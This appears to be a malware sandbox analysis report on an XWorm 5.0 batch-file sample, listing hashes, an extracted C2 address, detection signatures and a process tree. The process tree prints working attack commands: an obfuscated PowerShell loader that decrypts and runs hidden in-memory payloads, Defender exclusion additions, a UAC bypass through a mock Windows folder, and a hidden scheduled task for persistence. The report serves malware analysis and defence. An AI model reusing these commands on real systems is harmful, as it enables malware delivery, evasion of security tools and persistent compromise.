Analysis
max time kernel: 1799s
max time network: 1793s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 26-05-2024 14:55

Static task: static1

Behavioral task: behavioral1
  Sample: FN-INTERNAL.bat
  Resource: win10-20240404-en

Behavioral task: behavioral2
  Sample: FN-INTERNAL.bat
  Resource: win7-20240508-en

Behavioral task: behavioral3
  Sample: FN-INTERNAL.bat
  Resource: win10v2004-20240508-en
General
Target: FN-INTERNAL.bat
Size: 376KB
MD5: 121a69448e9f5eef0ba4c1229b471208
SHA1: 90abf42b20fb75a7f922b4a83cbeb77ca5dbf5d0
SHA256: b383a0ab3670e505ae0b7a7b6d68c096bb799ce858d8afc2e2ef5d1c1314051a
SHA512: c9e903245c3ab434018e23e4c51bf9d4fcbdb9dc1b85114574c12a2ce5c3ec6cd811fa1b51a34c86c695c6ba79cade1cdc215c4953090a342ba4ff6c1a92bc3d
SSDEEP: 6144:C+g8ai0m+BiS0FY9tRpUOAIeJxsOjzW1JlW5nHa5EV8hpzjHRQbh9xph9aK7PGaj:C+gdOSOYbRHjeJxbOJlW5niJSdT9amGk
Malware Config
Extracted
  Family: xworm
  Version: 5.0
  C2: software-led.gl.at.ply.gg:38954
  m6tgeOEIIMDuaFcQ
  install_file: USB.exe
Signatures

Detect Xworm Payload (1 IoC)
  resource | yara_rule
  behavioral1/memory/2764-213-0x00000252698A0000-0x00000252698AE000-memory.dmp | family_xworm

Blocklisted process makes network request (1 IoC)
  flow | pid | process
  3 | 2764 | powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
  Run Powershell and hide display window.
  pid | process
  2764 | powershell.exe
  3108 | powershell.exe
  3056 | powershell.exe

Executes dropped EXE (1 IoC)
  pid | process
  3580 | ComputerDefaults.exe

Drops file in System32 directory (10 IoCs)
  description | ioc | process
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe

Modifies data under HKEY_USERS (3 IoCs)
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | svchost.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | process
  2764 | powershell.exe (3 entries)
  3056 | powershell.exe (3 entries)
  2924 | powershell.exe (3 entries)
  3108 | powershell.exe (3 entries)
  2764 | powershell.exe (all remaining entries; 64 in total)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid | process
  2764 | powershell.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 2764 | powershell.exe
  Tokens, in order, for 3056 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  Tokens, in order, for 2924 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  Tokens, in order, for 3108 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33

Suspicious use of WriteProcessMemory (62 IoCs)
  description | pid | process | target process
  PID 2084 wrote to memory of 64 | 2084 | cmd.exe | cmd.exe (2 entries)
  PID 2084 wrote to memory of 2900 | 2084 | cmd.exe | cmd.exe (2 entries)
  PID 2084 wrote to memory of 2764 | 2084 | cmd.exe | powershell.exe (2 entries)
  PID 2764 wrote to memory of 3056 | 2764 | powershell.exe | powershell.exe (2 entries)
  PID 2764 wrote to memory of 516 | 2764 | powershell.exe | cmd.exe (2 entries)
  PID 516 wrote to memory of 3580 | 516 | cmd.exe | ComputerDefaults.exe (2 entries)
  PID 2764 wrote to memory of 4076 | 2764 | powershell.exe | cmd.exe (2 entries)
  PID 2764 wrote to memory of 2924 | 2764 | powershell.exe | powershell.exe (2 entries)
  PID 2764 wrote to memory of 3108 | 2764 | powershell.exe | powershell.exe (2 entries)
  PID 2764 wrote to memory of 3396 | 2764 | powershell.exe | Explorer.EXE
  PID 2764 wrote to memory of each of the following svchost.exe PIDs (one entry each) | 2764 | powershell.exe | svchost.exe: 2160, 3144, 4916, 1168, 1560, 372, 1940, 1740, 2320, 1328, 732, 1320, 2696, 2300, 1308, 1552, 3276, 908, 2680, 716, 4644, 1880, 1668, 1088, 1480, 1076, 2056, 1068, 864, 2420, 1036, 2600, 4764, 1808, 820, 2608, 2392, 1208, 1600, 1792, 408, 2308, 1384
Processes
(Process tree; indentation shows parent/child nesting, each entry gives the PID and the captured command line, followed by the signatures that matched on that process.)

- PID 732: c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
- PID 820: C:\Windows\system32\svchost.exe -k DcomLaunch
- PID 864: c:\windows\system32\svchost.exe -k rpcss
- PID 908: c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
- PID 372: c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
- PID 408: c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
  [Modifies data under HKEY_USERS]
- PID 716: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
- PID 1036: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
- PID 1068: c:\windows\system32\svchost.exe -k netsvcs -s Schedule
- PID 1076: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
- PID 1088: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
  [Drops file in System32 directory]
- PID 1168: c:\windows\system32\svchost.exe -k localservice -s nsi
- PID 1208: c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
- PID 1308: c:\windows\system32\svchost.exe -k localservice -s EventSystem
- PID 1320: c:\windows\system32\svchost.exe -k netsvcs -s Themes
- PID 1328: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
- PID 1384: c:\windows\system32\svchost.exe -k netsvcs -s UserManager
- PID 1480: c:\windows\system32\svchost.exe -k netsvcs -s SENS
- PID 1552: c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
- PID 1560: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
- PID 1600: c:\windows\system32\svchost.exe -k networkservice -s Dnscache
- PID 1668: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
- PID 1740: c:\windows\system32\svchost.exe -k localservice -s netprofm
- PID 1792: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
- PID 1808: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
- PID 1880: c:\windows\system32\svchost.exe -k appmodel -s StateRepository
- PID 1940: c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
- PID 2056: c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
- PID 2160: c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
- PID 2300: c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
- PID 2308: c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
- PID 2320: c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
- PID 2392: c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
  [Drops file in System32 directory]
- PID 2420: c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
- PID 2600: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
- PID 2608: c:\windows\system32\svchost.exe -k netsvcs -s WpnService
- PID 2696: c:\windows\system32\svchost.exe -k netsvcs -s Browser
- PID 3144: c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
- PID 3276: c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
- PID 3396: C:\Windows\Explorer.EXE
  - PID 2084: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat"
    [Suspicious use of WriteProcessMemory]
    - PID 64: cmd /c "set __=^&rem"
    - PID 2900: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('97S5HKOOEHVTK1tx3yu5lTndq7VoLhaiBMi1fQ7XC/w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BY/5WS5SKbagLrml3T2b0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ERsLU=New-Object System.IO.MemoryStream(,$param_var); $BcZuZ=New-Object System.IO.MemoryStream; $aYIjw=New-Object System.IO.Compression.GZipStream($ERsLU, [IO.Compression.CompressionMode]::Decompress); $aYIjw.CopyTo($BcZuZ); $aYIjw.Dispose(); $ERsLU.Dispose(); $BcZuZ.Dispose(); $BcZuZ.ToArray();}function execute_function($param_var,$param2_var){ $WzoGX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uXAck=$WzoGX.EntryPoint; $uXAck.Invoke($null, $param2_var);}$FVRVU = 'C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat';$host.UI.RawUI.WindowTitle = $FVRVU;$gLqRi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FVRVU).Split([Environment]::NewLine);foreach ($pQPCS in $gLqRi) { if ($pQPCS.StartsWith('VPEeCHQfOWHyYXzmlFZZ')) { $YmBxU=$pQPCS.Substring(20); break; }}$payloads_var=[string[]]$YmBxU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    - PID 2764: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      [Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory]
      - PID 3056: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        [Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken]
      - PID 516: "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
        [Suspicious use of WriteProcessMemory]
        - PID 3580: "C:\Windows \System32\ComputerDefaults.exe"
          [Executes dropped EXE]
      - PID 4076: "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
      - PID 2924: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL')
        [Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken]
      - PID 3108: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        [Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken]
- PID 4764: c:\windows\system32\svchost.exe -k localservice -s CDPSvc
- PID 4916: c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
- PID 4644: C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
  [Modifies data under HKEY_USERS]
- PID 2680: c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 3KB
  MD5: 8592ba100a78835a6b94d5949e13dfc1
  SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
  SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
  SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

- Filesize: 50KB
  MD5: 2143b379fed61ab5450bab1a751798ce
  SHA1: 32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
  SHA256: a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
  SHA512: 0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

- Filesize: 1KB
  MD5: 37dd47dad31b9c666f0f4df0beeddfa2
  SHA1: a117eb3f670dff0656a96b15ba5f872f3da17591
  SHA256: 61bf769b256336c493ece34f176e0edcc1e47cde2d9e39a41f9ad69f80c9d83b
  SHA512: 120986ffd44f23531f3bb7de62c18e40f8b2cb12c8a470edb5b03e44f68dccdf04bbe2faf56759977f357334c48ae431dbcddf845e9005ba2a805383e8c8c118

- Filesize: 1KB
  MD5: 2f2d37af23e9151207deae9d60891ea6
  SHA1: 80515bef4c534014e11d2e902eec8d1b61c92942
  SHA256: 100bdf7c9bf30f3a27fb56df9b6b7e509bcabc91137f4a0fc6907df494d2478e
  SHA512: e026c03c4bc4f35be469c197b2bab87945cce9dfb5a902727c9e533eb49e6c2179109eca6b813e0a4943173bd932403ecbdfc48ce5aec98cbfa027a59062fc3e

- Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

- Filesize: 72KB
  MD5: 56d03e4218082266a9cdd8600537d891
  SHA1: c153719f971dcee8f6985d7c79f64fc88dd8663c
  SHA256: 210d5714497505022aa068167f7ed5bb826abcf53cfe741c9860a2c8dce3f54a
  SHA512: f2c64a4dbab789635bf97b3d615fcc96dfe8c4094b67a464eb34bc84501eb7648e7fa692971e917c1ebfac0548187721ecc552aaad35767f8a40846d922613d3